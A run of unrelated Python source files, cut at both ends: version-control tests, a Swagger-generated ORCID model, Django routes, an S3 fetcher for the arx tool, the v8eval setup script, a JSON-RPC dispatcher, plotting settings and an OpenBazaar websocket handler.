'changesets': [16, 16, 16, 16, 16, 16, 16, 16, 16, 16,
16, 16, 17, 16, 16, 18, 18, 18]},
20: {'lines_no': 18,
'changesets': [16, 16, 16, 16, 16, 16, 16, 16, 16, 16,
16, 16, 17, 16, 16, 18, 18, 18]},
55: {'lines_no': 18, 'changesets': [16, 16, 16, 16, 16, 16,
16, 16, 16, 16, 16, 16,
17, 16, 16, 18, 18, 18]}},
'MANIFEST.in': {89: {'lines_no': 5,
'changesets': [7, 7, 7, 71, 71]},
20: {'lines_no': 3,
'changesets': [7, 7, 7]},
55: {'lines_no': 3,
'changesets': [7, 7, 7]}}}
for fname, revision_dict in files.items():
for rev, data in revision_dict.items():
cs = self.repo.get_changeset(rev)
l1_1 = [x[1] for x in cs.get_file_annotate(fname)]
l1_2 = [x[2]().raw_id for x in cs.get_file_annotate(fname)]
self.assertEqual(l1_1, l1_2)
l1 = l1_2 = [x[2]().revision for x in cs.get_file_annotate(fname)]
l2 = files[fname][rev]['changesets']
self.assertTrue(l1 == l2 , "The lists of revision for %s@rev%s"
"from annotation list should match each other,"
"got \n%s \nvs \n%s " % (fname, rev, l1, l2))
def test_changeset_state(self):
"""
Tests which files have been added/changed/removed at particular revision
"""
# rev 46ad32a4f974:
# hg st --rev 46ad32a4f974
# changed: 13
# added: 20
# removed: 1
changed = set(['.hgignore'
, 'README.rst' , 'docs/conf.py' , 'docs/index.rst' , 'setup.py'
, 'tests/test_hg.py' , 'tests/test_nodes.py' , 'vcs/__init__.py'
, 'vcs/backends/__init__.py' , 'vcs/backends/base.py'
, 'vcs/backends/hg.py' , 'vcs/nodes.py' , 'vcs/utils/__init__.py'])
added = set(['docs/api/backends/hg.rst'
, 'docs/api/backends/index.rst' , 'docs/api/index.rst'
, 'docs/api/nodes.rst' , 'docs/api/web/index.rst'
, 'docs/api/web/simplevcs.rst' , 'docs/installation.rst'
, 'docs/quickstart.rst' , 'setup.cfg' , 'vcs/utils/baseui_config.py'
, 'vcs/utils/web.py' , 'vcs/web/__init__.py' , 'vcs/web/exceptions.py'
, 'vcs/web/simplevcs/__init__.py' , 'vcs/web/simplevcs/exceptions.py'
, 'vcs/web/simplevcs/middleware.py' , 'vcs/web/simplevcs/models.py'
, 'vcs/web/simplevcs/settings.py' , 'vcs/web/simplevcs/utils.py'
, 'vcs/web/simplevcs/views.py'])
removed = set(['docs/api.rst'])
chset64 = self.repo.get_changeset('46ad32a4f974')
self.assertEqual(set((node.path for node in chset64.added)), added)
self.assertEqual(set((node.path for node in chset64.changed)), changed)
self.assertEqual(set((node.path for node in chset64.removed)), removed)
# rev b090f22d27d6:
# hg st --rev b090f22d27d6
# changed: 13
# added: 20
# removed: 1
chset88 = self.repo.get_changeset('b090f22d27d6')
self.assertEqual(set((node.path for node in chset88.added)), set())
self.assertEqual(set((node.path for node in chset88.changed)),
set(['.hgignore']))
self.assertEqual(set((node.path for node in chset88.removed)), set())
# 85:
# added: 2 ['vcs/utils/diffs.py', 'vcs/web/simplevcs/views/diffs.py']
# changed: 4 ['vcs/web/simplevcs/models.py', ...]
# removed: 1 ['vcs/utils/web.py']
chset85 = self.repo.get_changeset(85)
self.assertEqual(set((node.path for node in chset85.added)), set([
'vcs/utils/diffs.py',
'vcs/web/simplevcs/views/diffs.py']))
self.assertEqual(set((node.path for node in chset85.changed)), set([
'vcs/web/simplevcs/models.py',
'vcs/web/simplevcs/utils.py',
'vcs/web/simplevcs/views/__init__.py',
'vcs/web/simplevcs/views/repository.py',
]))
self.assertEqual(set((node.path for node in chset85.removed)),
set(['vcs/utils/web.py']))
def test_files_state(self):
"""
Tests state of FileNodes.
"""
chset = self.repo.get_changeset(85)
node = chset.get_node('vcs/utils/diffs.py')
self.assertTrue(node.state, NodeState.ADDED)
self.assertTrue(node.added)
self.assertFalse(node.changed)
self.assertFalse(node.not_changed)
self.assertFalse(node.removed)
chset = self.repo.get_changeset(88)
node = chset.get_node('.hgignore')
self.assertTrue(node.state, NodeState.CHANGED)
self.assertFalse(node.added)
self.assertTrue(node.changed)
self.assertFalse(node.not_changed)
self.assertFalse(node.removed)
chset = self.repo.get_changeset(85)
node = chset.get_node('setup.py')
self.assertTrue(node.state, NodeState.NOT_CHANGED)
self.assertFalse(node.added)
self.assertFalse(node.changed)
self.assertTrue(node.not_changed)
self.assertFalse(node.removed)
# If node has REMOVED state then trying to fetch it would raise
# ChangesetError exception
chset = self.repo.get_changeset(2)
path = 'vcs/backends/BaseRepository.py'
self.assertRaises(NodeDoesNotExistError, chset.get_node, path)
# but it would be one of ``removed`` (changeset's attribute)
self.assertTrue(path in [rf.path for rf in chset.removed])
def test_commit_message_is_unicode(self):
for cm in self.repo:
self.assertEqual(type(cm.message), unicode)
def test_changeset_author_is_unicode(self):
for cm in self.repo:
self.assertEqual(type(cm.author), unicode)
def test_repo_files_content_is_unicode(self):
test_changeset = self.repo.get_changeset(100)
for node in test_changeset.get_node('/'):
if node.is_file():
self.assertEqual(type(node.content), unicode)
def test_wrong_path(self):
# There is 'setup.py' in the root dir but not there:
path = 'foo/bar/setup.py'
self.assertRaises(VCSError, self.repo.get_changeset().get_node, path)
def test_archival_file(self):
#TODO:
pass
def test_archival_as_generator(self):
#TODO:
pass
def test_archival_wrong_kind(self):
tip = self.repo.get_changeset()
self.assertRaises(VCSError, tip.fill_archive, kind='error')
def test_archival_empty_prefix(self):
#TODO:
pass
def test_author_email(self):
self.assertEqual('marcin@python-blog.com',
self.repo.get_changeset('b986218ba1c9').author_email)
self.assertEqual('lukasz.balcerzak@python-center.pl',
self.repo.get_changeset('3803844fdbd3').author_email)
self.assertEqual('',
self.repo.get_changeset('84478366594b').author_email)
def test_author_username(self):
self.assertEqual('Marcin Kuzminski',
self.repo.get_changeset('b986218ba1c9').author_name)
self.assertEqual('Lukasz Balcerzak',
self.repo.get_changeset('3803844fdbd3').author_name)
self.assertEqual('marcink',
self.repo.get_changeset('84478366594b').author_name)
|
"""
ORCID Member
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from orcid_api_v3.models.external_i_ds_v30_rc2 import ExternalIDsV30Rc2 # noqa: F401,E501
from orcid_api_v3.models.fuzzy_date_v30_rc2 import FuzzyDateV30Rc2 # noqa: F401,E501
from orcid_api_v3.models.research_resource_hosts_v30_rc2 import ResearchResourceHostsV30Rc2 # noqa: F401,E501
from orcid_api_v3.models.research_resource_title_v30_rc2 import ResearchResourceTitleV30Rc2 # noqa: F401,E501
from orcid_api_v3.models.url_v30_rc2 import UrlV30Rc2 # noqa: F401,E501
class ResearchResourceProposalV30Rc2(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'title': 'ResearchResourceTitleV30Rc2',
'hosts': 'ResearchResourceHostsV30Rc2',
'external_ids': 'ExternalIDsV30Rc2',
'start_date': 'FuzzyDateV30Rc2',
'end_date': 'FuzzyDateV30Rc2',
'url': 'UrlV30Rc2'
}
attribute_map = {
'title': 'title',
'hosts': 'hosts',
'external_ids': 'external-ids',
'start_date': 'start-date',
'end_date': 'end-date',
'url': 'url'
}
def __init__(self, title=None, hosts=None, external_ids=None, start_date=None, end_date=None, url=None): # noqa: E501
"""ResearchResourceProposalV30Rc2 - a model defined in Swagger""" # noqa: E501
self._title = None
self._hosts = None
self._external_ids = None
self._start_date = None
self._end_date = None
self._url = None
self.discriminator = None
if title is not None:
self.title = title
if hosts is not None:
self.hosts = hosts
if external_ids is not None:
self.external_ids = external_ids
if start_date is not None:
self.start_date = start_date
if end_date is not None:
self.end_date = end_date
if url is not None:
self.url = url
@property
def title(self):
"""Gets the title of this ResearchResourceProposalV30Rc2. # noqa: E501
:return: The title of this ResearchResourceProposalV30Rc2. # noqa: E501
:rtype: ResearchResourceTitleV30Rc2
"""
return self._title
@title.setter
def title(self, title):
"""Sets the title of this ResearchResourceProposalV30Rc2.
:param title: The title of this ResearchResourceProposalV30Rc2. # noqa: E501
:type: ResearchResourceTitleV30Rc2
"""
self._title = title
@property
def hosts(self):
"""Gets the hosts of this ResearchResourceProposalV30Rc2. # noqa: E501
:return: The hosts of this ResearchResourceProposalV30Rc2. # noqa: E501
:rtype: ResearchResourceHostsV30Rc2
"""
return self._hosts
@hosts.setter
def hosts(self, hosts):
"""Sets the hosts of this ResearchResourceProposalV30Rc2.
:param hosts: The hosts of this ResearchResourceProposalV30Rc2. # noqa: E501
:type: ResearchResourceHostsV30Rc2
"""
self._hosts = hosts
@property
def external_ids(self):
"""Gets the external_ids of this ResearchResourceProposalV30Rc2. # noqa: E501
:return: The external_ids of this ResearchResourceProposalV30Rc2. # noqa: E501
:rtype: ExternalIDsV30Rc2
"""
return self._external_ids
@external_ids.setter
def external_ids(self, external_ids):
"""Sets the external_ids of this ResearchResourceProposalV30Rc2.
:param external_ids: The external_ids of this ResearchResourceProposalV30Rc2. # noqa: E501
:type: ExternalIDsV30Rc2
"""
self._external_ids = external_ids
@property
def start_date(self):
"""Gets the start_date of this ResearchResourceProposalV30Rc2. # noqa: E501
:return: The start_date of this ResearchResourceProposalV30Rc2. # noqa: E501
:rtype: FuzzyDateV30Rc2
"""
return self._start_date
@start_date.setter
def start_date(self, start_date):
"""Sets the start_date of this ResearchResourceProposalV30Rc2.
:param start_date: The start_date of this ResearchResourceProposalV30Rc2. # noqa: E501
:type: FuzzyDateV30Rc2
"""
self._start_date = start_date
@property
def end_date(self):
"""Gets the end_date of this ResearchResourceProposalV30Rc2. # noqa: E501
:return: The end_date of this ResearchResourceProposalV30Rc2. # noqa: E501
:rtype: FuzzyDateV30Rc2
"""
return self._end_date
@end_date.setter
def end_date(self, end_date):
"""Sets the end_date of this ResearchResourceProposalV30Rc2.
:param end_date: The end_date of this ResearchResourceProposalV30Rc2. # noqa: E501
:type: FuzzyDateV30Rc2
"""
self._end_date = end_date
@property
def url(self):
"""Gets the url of this ResearchResourceProposalV30Rc2. # noqa: E501
:return: The url of this ResearchResourceProposalV30Rc2. # noqa: E501
:rtype: UrlV30Rc2
"""
return self._url
@url.setter
def url(self, url):
"""Sets the url of this ResearchResourceProposalV30Rc2.
:param url: The url of this ResearchResourceProposalV30Rc2. # noqa: E501
:type: UrlV30Rc2
"""
self._url = url
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ResearchResourceProposalV30Rc2, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ResearchResourceProposalV30Rc2):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
from django.conf.urls import url
from . import views
from django.views.generic import RedirectView
from django.core.urlresolvers import reverse_lazy
urlpatterns = [
url(r'^$', RedirectView.as_view(url=reverse_lazy('list_job')), name='index'),
url(r'^list-job$', views.list_job, name='list_job'),
url(r'^new-job$', views.new_job, name='new_job'),
url(r'^send-to-chronos$', views.send_to_chronos, name='send_to_chronos'),
url(r'^ajax-list-job$', views.ajax_list_job, name='ajax_list_job'),
]
|
import boto3
from sh import Command, chmod, cp, mkdir, rsync, ErrorReturnCode
import uritools
from ..decorators import schemes
from ..err import Err
from .files import File, FileTar
from .http import HTTP, HTTPTar, HTTPJar
from .jar import Jar
from .core import onepath, oneurl, SignableURL, twopaths
from .tar import Tar
class S3(SignableURL):
"""Links objects in S3.
The URL can end with a ``/`` to give it directory nature; otherwise it has
file nature. With directory nature, the directory is unpacked recursively.
"""
@oneurl
@schemes('s3')
def __init__(self, url):
self.url = url
if url.fragment is not None:
raise Invalid('Arx can not work with plain S3 URLs that have '
'fragments.')
@property
def dirlike(self):
return self.url.path.endswith('/')
@property
def base(self):
# Allows subclasses to inherit this implementation by throwing away the
# prefix.
scheme = self.url.scheme.split('+')[-1]
return self.url._replace(scheme=scheme, fragment=None)
def signed_get(self, seconds=3600):
if self.dirlike:
raise Invalid('Not able to sign directory-like S3 URLs.')
data = dict(Bucket=self.url.host, Key=self.url.path)
s3 = boto3.client('s3')
link = s3.generate_presigned_url('get_object', data, ExpiresIn=seconds)
return link
def sign(self):
return HTTP(self.signed_get())
@onepath
def cache(self, cache):
data = self.dataname(cache)
cmd = Command('aws')
sub = 'sync' if self.dirlike else 'cp'
cmd('s3', sub, uritools.uriunsplit(self.base), str(data))
return File('file:///' + str(data))
@twopaths
def place(self, cache, path):
mkdir('-p', path.dirname)
if self.dirlike:
rsync('-ai', str(self.data(cache)) + '/', str(path))
else:
cp(str(self.data(cache)), str(path))
@onepath
def run(self, cache, args=[]):
if self.dirlike:
raise Invalid('Arx can not run directory-like (ending with `/`) '
'S3 paths.')
item = self.data(cache)
chmod('a+rx', str(item))
cmd = Command(str(item))
cmd(*args)
class S3Tar(Tar, S3):
"""Links to tar archives available over S3.
Note that these URLs may not end with a slash.
These URLs have directory nature unless a fragment is passed, as described
under :class:`~arx.sources.tar.Tar`.
"""
@oneurl
@schemes('tar+s3')
def __init__(self, url):
self.url = url
if self.dirlike:
raise Invalid('Arx can not treat directory-like (ending with `/`) '
'S3 paths like tarballs.')
@onepath
def cache(self, cache):
as_file = super(S3Tar, self).cache(cache)
return FileTar.resolve(as_file.resolved)
def sign(self):
return HTTPTar('tar+' + self.signed_get())
class S3Jar(Jar, S3):
@oneurl
@schemes('jar+s3')
def __init__(self, url):
self.url = url
if self.url.fragment is not None:
raise Invalid('Arx can not handle Jar S3 URLs with fragments.')
if self.dirlike:
raise Invalid('Arx can not treat directory-like (ending with `/`) '
'S3 paths like Jars.')
def sign(self):
return HTTPJar('jar+' + self.signed_get())
class Invalid(Err):
pass
def no_credentials():
aws = Command('aws')
try:
aws('sts', 'get-caller-identity')
return False
except ErrorReturnCode:
return True
|
from satella.threads import BaseThread
from satella.contrib.instrumentation_as_json import export
import time
class InstrumentationSaverThread(BaseThread):
def __init__(self, insmgr, confsection):
BaseThread.__init__(self)
self.interval = confsection['save_interval']
self.savetarget = confsection['save_json_to']
self.insmgr = insmgr
def run(self):
while not self._terminating:
time.sleep(self.interval)
with open(self.savetarget, 'wb') as x:
x.write(export(self.insmgr))
|
from django import template
from django.template.loader import render_to_string
def split_into_variables(token):
# split and remove name
tokens = token.split_contents()[1:]
return map(template.Variable, tokens)
class GenericTemplateTag(template.Node):
def __init__(self, *args, **kwargs):
raise NotImplementedError(self)
def render(self):
raise NotImplementedError(self)
def resolve(self, context, obj):
return (
obj.resolve(context) if hasattr(obj, 'resolve')
else obj
)
@classmethod
def invoke(cls, parser, token):
variables = split_into_variables(token)
try:
return cls(*variables)
except TypeError as e:
if e.args[0].startswith('__init__'):
message = 'Bad arguments for {}: {}'.format(cls, e)
raise TypeError(message) from e
else:
raise
def render_to_string(self, *args, **kwargs):
return render_to_string(
self.template,
*args, **kwargs
)
|
from sen.docker_backend import DockerBackend, DockerContainer
from sen.tui.views.container_info import ProcessList
from tests.real import mock
def test_short_id():
mock()
b = DockerBackend()
operation = DockerContainer({"Status": "Up", "Id": "voodoo"}, b).top()
top_response = operation.response
pt = ProcessList(top_response)
# 24502
# \ 24542
# \ 23743
# \ 18725
# \ 18733
# \ 18743
# \ 23819
root_process = pt.get_root_process()
assert root_process.pid == "24502"
assert pt.get_parent_process(root_process) is None
p_24542 = pt.get_first_child_process(root_process)
assert p_24542.pid == "24542"
assert pt.get_last_child_process(root_process).pid == "24542"
p_23743 = pt.get_first_child_process(p_24542)
assert p_23743.pid == "23743"
assert pt.get_last_child_process(p_24542).pid == "23743"
p_18725 = pt.get_first_child_process(p_23743)
assert p_18725.pid == "18725"
assert pt.get_prev_sibling(p_18725) is None
assert pt.get_parent_process(p_18725).pid == "23743"
p_18733 = pt.get_next_sibling(p_18725)
assert p_18733.pid == "18733"
p_23819 = pt.get_last_child_process(p_23743)
assert p_23819.pid == "23819"
assert pt.get_next_sibling(p_23819) is None
assert pt.get_parent_process(p_23819).pid == "23743"
p_18743 = pt.get_prev_sibling(p_23819)
assert p_18743.pid == "18743"
assert pt.get_prev_sibling(p_18733) is p_18725
assert pt.get_next_sibling(p_18733) is p_18743
assert pt.get_prev_sibling(p_18743) is p_18733
assert pt.get_next_sibling(p_18743) is p_23819
|
from distutils.core import setup, Extension
from os import system, environ
from os.path import abspath, dirname, exists
from sys import platform
v8eval_root = abspath(dirname(__file__))
v8_dir = v8eval_root + '/v8'
py_dir = v8eval_root + '/python'
py_v8eval_dir = py_dir + '/v8eval'
system(v8eval_root + '/build.sh')
system('cp ' + v8eval_root + '/src/v8eval.h ' + py_v8eval_dir)
system('cp ' + v8eval_root + '/src/v8eval_python.h ' + py_v8eval_dir)
system('swig -c++ -python -outdir ' + py_v8eval_dir + ' -o ' + py_v8eval_dir + '/v8eval_wrap.cxx ' + py_v8eval_dir + '/v8eval.i')
system('cat ' + py_dir + '/_v8eval.py >> ' + py_v8eval_dir + '/v8eval.py')
if platform == 'linux' or platform == 'linux2':
environ['CC'] = v8_dir + '/third_party/llvm-build/Release+Asserts/bin/clang'
environ['CXX'] = v8_dir + '/third_party/llvm-build/Release+Asserts/bin/clang++'
environ['PATH'] = v8_dir + '/third_party/binutils/Linux_x64/Release/bin:' + environ['PATH']
include_dirs = [v8_dir, v8_dir + '/include']
library_dirs = [v8eval_root + '/build', v8_dir + '/out.gn/x64.release/obj']
libraries=['v8eval',
'v8eval_python',
'v8_libplatform',
'v8_base',
'v8_libbase',
'v8_libsampler',
'v8_init',
'v8_initializers',
'v8_nosnapshot',
'torque_generated_initializers']
extra_compile_args=['-O3', '-std=c++14', '-stdlib=libc++']
if platform == 'linux' or platform == 'linux2':
library_dirs += [v8_dir + '/out.gn/x64.release/obj/buildtools/third_party/libc++',
v8_dir + '/out.gn/x64.release/obj/buildtools/third_party/libc++abi']
libraries += ['rt', 'c++', 'c++abi']
extra_compile_args += ['-isystem' + v8_dir + '/buildtools/third_party/libc++/trunk/include',
'-isystem' + v8_dir + '/buildtools/third_party/libc++abi/trunk/include']
v8eval_module = Extension(
'_v8eval',
sources=[py_v8eval_dir + '/v8eval_wrap.cxx'],
libraries=libraries,
include_dirs=include_dirs,
library_dirs=library_dirs,
extra_compile_args=extra_compile_args)
description = 'Run JavaScript engine V8 in Python'
long_description = description
try:
import pypandoc
long_description = pypandoc.convert('README.md', 'rst')
except ImportError:
pass
system("rm -rf " + v8_dir + "/third_party/perfetto")
system("mkdir " + v8_dir + "/buildtools/third_party/libc++/trunk/test/std/experimental/filesystem/Inputs/static_test_env/dne")
setup(name='v8eval',
version='0.3.2',
author='Yoshiyuki Mineo',
author_email='Yoshiyuki.Mineo@sony.com',
license='MIT',
url='https://github.com/sony/v8eval',
description=description,
long_description=long_description,
keywords='v8 js javascript binding',
ext_modules=[v8eval_module],
py_modules=['v8eval'],
package_dir={'': 'python/v8eval'},
classifiers=['License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
'Operating System :: POSIX :: Linux',
'Operating System :: MacOS :: MacOS X',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries'])
|
import sys
import traceback
import rpcrequest
import rpcresponse
import rpcerror
import rpcjson
def rpcmethod(func):
"""
Decorator
Sign the decorated method as JSON-RPC-Method
"""
# Sign the function as JSON-RPC-Method
func.rpcmethod = True
# Return the function itself
return func
class JsonRpc(object):
"""
JSON-RPC
"""
methods = {}
def __init__(self, methods = None):
"""
Initializes the JSON-RPC-Class
:param methods: Json-RPC-Methods. `None` or dictionary with
method names as keys and functions as values. Syntax::
{
"<method_name>": <method_function>,
...
}
"""
if methods:
self.methods.update(methods)
def call(self, json_request):
"""
Parses the *json_request*, calls the function(s)
and returns the *json_response*.
:param json_request: JSON-RPC-string with one or more JSON-RPC-requests
:return: JSON-RPC-string with one or more responses.
"""
# List for the responses
responses = []
# List with requests
requests = rpcrequest.parse_request_json(json_request)
if not isinstance(requests, list):
requests = [requests]
# Every JSON-RPC request in a batch of requests
for request in requests:
# Request-Data
jsonrpc = request.jsonrpc
id = request.id
method = request.get("method", "")
if method not in self.methods:
# Check if requested method is signed as *rpcmethod*
_method = getattr(self, method, None)
if (
_method and
callable(_method) and
getattr(_method, "rpcmethod", False)
):
self.methods[method] = _method
if method not in self.methods:
# Method not found error
responses.append(
rpcresponse.Response(
jsonrpc = jsonrpc,
id = id,
error = rpcerror.MethodNotFound(
data = u"Method name: '%s'" % method
)
)
)
continue
# split positional and named params
positional_params, named_params = request.get_splitted_params()
# Call the method with parameters
try:
rpc_function = self.methods[method]
result = rpc_function(*positional_params, **named_params)
# No return value is OK if we don´t have an ID (=notification)
if result is None:
if id:
responses.append(
rpcresponse.Response(
jsonrpc = jsonrpc,
id = id,
error = rpcerror.InternalError(
data = u"No result from JSON-RPC method."
)
)
)
else:
# Successful response
responses.append(
rpcresponse.Response(jsonrpc = jsonrpc, id = id, result = result)
)
except TypeError, err:
traceback_info = "".join(traceback.format_exception(*sys.exc_info()))
if "takes exactly" in unicode(err) and "arguments" in unicode(err):
responses.append(
rpcresponse.Response(
jsonrpc = jsonrpc,
id = id,
error = rpcerror.InvalidParams(data = traceback_info)
)
)
else:
responses.append(
rpcresponse.Response(
jsonrpc = jsonrpc,
id = id,
error = rpcerror.InternalError(data = traceback_info)
)
)
except rpcerror.JsonRpcError, err:
responses.append(
rpcresponse.Response(
jsonrpc = jsonrpc,
id = id,
error = err
)
)
except BaseException, err:
traceback_info = "".join(traceback.format_exception(*sys.exc_info()))
if hasattr(err, "data"):
error_data = err.data
else:
error_data = None
responses.append(
rpcresponse.Response(
jsonrpc = jsonrpc,
id = id,
error = rpcerror.InternalError(
data = error_data or traceback_info
)
)
)
# Convert responses to dictionaries and filter it
responses_ = []
for response in responses:
if response.id:
responses_.append(response.to_dict())
responses = responses_
# Return as JSON-string (batch or normal)
if responses:
if len(requests) == 1:
return rpcjson.dumps(responses[0])
elif len(requests) > 1:
return rpcjson.dumps(responses)
def __call__(self, json_request):
"""
Redirects the requests to *self.call*
"""
return self.call(json_request)
def __getitem__(self, key):
"""
Gets back the requested method
"""
return self.methods[key]
def __setitem__(self, key, value):
"""
Appends or replaces a method
"""
self.methods[key] = value
def __delitem__(self, key):
"""
Deletes a method
"""
del self.methods[key]
|
import threading
from queue import Queue
class WorkQueue(Queue):
'''Simple wrapper to also provide ability to indicate when no more work is expected.
'''
def __init__(self, *args):
Queue.__init__(self, *args) # Queue does not inherit from object (is an old-style class)
self._all_jobs_submitted = threading.Event()
def all_jobs_submitted(self):
'''Indicate that no more work is expected on this queue.'''
self._all_jobs_submitted.set()
def is_done(self):
'''Determine if there is more work expected on this queue.'''
return self._all_jobs_submitted.is_set() and self.empty()
|
import matplotlib as mpl
import pylab as pl
from pylab import rc
rc('axes', linewidth=1.2)
mpl.rcParams['font.size'] = 18.
mpl.rcParams['font.family'] = 'serif'
mpl.rcParams['font.serif'] = ['Times']#Computer Modern Roman']
mpl.rcParams['font.weight'] = 'bold'
mpl.rcParams['text.usetex'] = True
mpl.rcParams['axes.labelsize'] = 18
mpl.rcParams['xtick.labelsize'] = 20.
mpl.rcParams['ytick.labelsize'] = 20.
mpl.rcParams['xtick.major.size']= 10.
mpl.rcParams['xtick.minor.size']= 5.
mpl.rcParams['ytick.major.size']= 10.
mpl.rcParams['ytick.minor.size']= 5.
params = {'legend.fontsize': 20,
#'legend.linewidth': 1,
'legend.numpoints':1,
'legend.handletextpad':1
}
pl.rcParams.update(params)
print ("pylab set up, rcParams")
|
__author__ = 'chris'
import json
import os
import time
from constants import DATA_FOLDER
from db.datastore import VendorStore, MessageStore
from random import shuffle
from autobahn.twisted.websocket import WebSocketServerFactory, WebSocketServerProtocol
from protos.countries import CountryCode
from protos.objects import Plaintext_Message, Value
from protos import objects
from twisted.internet import defer
from binascii import unhexlify
from dht.node import Node
class WSProtocol(WebSocketServerProtocol):
"""
Handles new incoming requests coming from a websocket.
"""
def onOpen(self):
self.factory.register(self)
def get_vendors(self, message_id):
if message_id in self.factory.outstanding:
vendors = self.factory.outstanding[message_id]
else:
vendors = VendorStore().get_vendors()
shuffle(vendors)
self.factory.outstanding[message_id] = vendors
def count_results(results):
to_query = 0
for result in results:
if not result:
to_query += 1
for node in vendors[:to_query]:
dl.append(self.factory.mserver.get_user_metadata(node).addCallback(handle_response, node))
defer.gatherResults(dl).addCallback(count_results)
def handle_response(metadata, node):
if metadata is not None:
vendor = {
"id": message_id,
"vendor":
{
"guid": node.id.encode("hex"),
"name": metadata.name,
"handle": metadata.handle,
"avatar_hash": metadata.avatar_hash.encode("hex"),
"nsfw": metadata.nsfw
}
}
self.sendMessage(json.dumps(vendor, indent=4), False)
vendors.remove(node)
return True
else:
VendorStore().delete_vendor(node.id)
vendors.remove(node)
return False
dl = []
for node in vendors[:30]:
dl.append(self.factory.mserver.get_user_metadata(node).addCallback(handle_response, node))
defer.gatherResults(dl).addCallback(count_results)
def get_homepage_listings(self, message_id):
if message_id not in self.factory.outstanding:
self.factory.outstanding[message_id] = []
vendors = VendorStore().get_vendors()
shuffle(vendors)
def count_results(results):
to_query = 30
for result in results:
to_query -= result
shuffle(vendors)
if to_query/3 > 0 and len(vendors) > 0:
for node in vendors[:to_query/3]:
dl.append(self.factory.mserver.get_listings(node).addCallback(handle_response, node))
defer.gatherResults(dl).addCallback(count_results)
def handle_response(listings, node):
count = 0
if listings is not None:
for l in listings.listing:
if l.contract_hash not in self.factory.outstanding[message_id]:
listing_json = {
"id": message_id,
"listing":
{
"guid": node.id.encode("hex"),
"handle": listings.handle,
"avatar_hash": listings.avatar_hash.encode("hex"),
"title": l.title,
"contract_hash": l.contract_hash.encode("hex"),
"thumbnail_hash": l.thumbnail_hash.encode("hex"),
"category": l.category,
"price": l.price,
"currency_code": l.currency_code,
"nsfw": l.nsfw,
"origin": str(CountryCode.Name(l.origin)),
"ships_to": []
}
}
for country in l.ships_to:
listing_json["listing"]["ships_to"].append(str(CountryCode.Name(country)))
if not os.path.isfile(DATA_FOLDER + 'cache/' + l.thumbnail_hash.encode("hex")):
self.factory.mserver.get_image(node, l.thumbnail_hash)
if not os.path.isfile(DATA_FOLDER + 'cache/' + listings.avatar_hash.encode("hex")):
self.factory.mserver.get_image(node, listings.avatar_hash)
self.sendMessage(json.dumps(listing_json, indent=4), False)
count += 1
self.factory.outstanding[message_id].append(l.contract_hash)
if count == 3:
return count
vendors.remove(node)
else:
VendorStore().delete_vendor(node.id)
vendors.remove(node)
return count
dl = []
for vendor in vendors[:10]:
dl.append(self.factory.mserver.get_listings(vendor).addCallback(handle_response, vendor))
defer.gatherResults(dl).addCallback(count_results)
def send_message(self, guid, handle, message, subject, message_type, recipient_encryption_key):
MessageStore().save_message(guid, handle, "", recipient_encryption_key, subject,
message_type, message, "", time.time(), "", True)
def send(node_to_send):
n = node_to_send if node_to_send is not None else Node(unhexlify(guid), "123.4.5.6", 1234)
self.factory.mserver.send_message(n, recipient_encryption_key,
Plaintext_Message.Type.Value(message_type.upper()),
message, subject)
self.factory.kserver.resolve(unhexlify(guid)).addCallback(send)
def search(self, message_id, keyword):
def respond(l, node):
if l is not None:
listing_json = {
"id": message_id,
"listing":
{
"guid": node.id.encode("hex"),
"title": l.title,
"contract_hash": l.contract_hash.encode("hex"),
"thumbnail_hash": l.thumbnail_hash.encode("hex"),
"category": l.category,
"price": l.price,
"currency_code": l.currency_code,
"nsfw": l.nsfw,
"origin": str(CountryCode.Name(l.origin)),
"ships_to": []
}
}
for country in l.ships_to:
listing_json["listing"]["ships_to"].append(str(CountryCode.Name(country)))
self.sendMessage(json.dumps(listing_json, indent=4), False)
def parse_results(values):
if values is not None:
for v in values:
try:
val = Value()
val.ParseFromString(v)
n = objects.Node()
n.ParseFromString(val.serializedData)
node_to_ask = Node(n.guid, n.ip, n.port, n.signedPublicKey, True)
self.factory.mserver.get_contract_metadata(node_to_ask,
val.valueKey).addCallback(respond, node_to_ask)
except Exception:
pass
self.factory.kserver.get(keyword.lower()).addCallback(parse_results)
def onMessage(self, payload, isBinary):
try:
request_json = json.loads(payload)
message_id = request_json["request"]["id"]
if request_json["request"]["command"] == "get_vendors":
self.get_vendors(message_id)
elif request_json["request"]["command"] == "get_homepage_listings":
self.get_homepage_listings(message_id)
elif request_json["request"]["command"] == "search":
self.search(message_id, request_json["request"]["keyword"].lower())
elif request_json["request"]["command"] == "send_message":
self.send_message(request_json["request"]["guid"],
request_json["request"]["handle"],
request_json["request"]["message"],
request_json["request"]["subject"],
request_json["request"]["message_type"],
request_json["request"]["recipient_key"])
except Exception:
pass
def connectionLost(self, reason):
WebSocketServerProtocol.connectionLost(self, reason)
self.factory.unregister(self)
class WSFactory(WebSocketServerFactory):
"""
Simple broadcast server broadcasting any message it receives to all
currently connected clients.
"""
def __init__(self, url, mserver, kserver, debug=False, debugCodePaths=False):
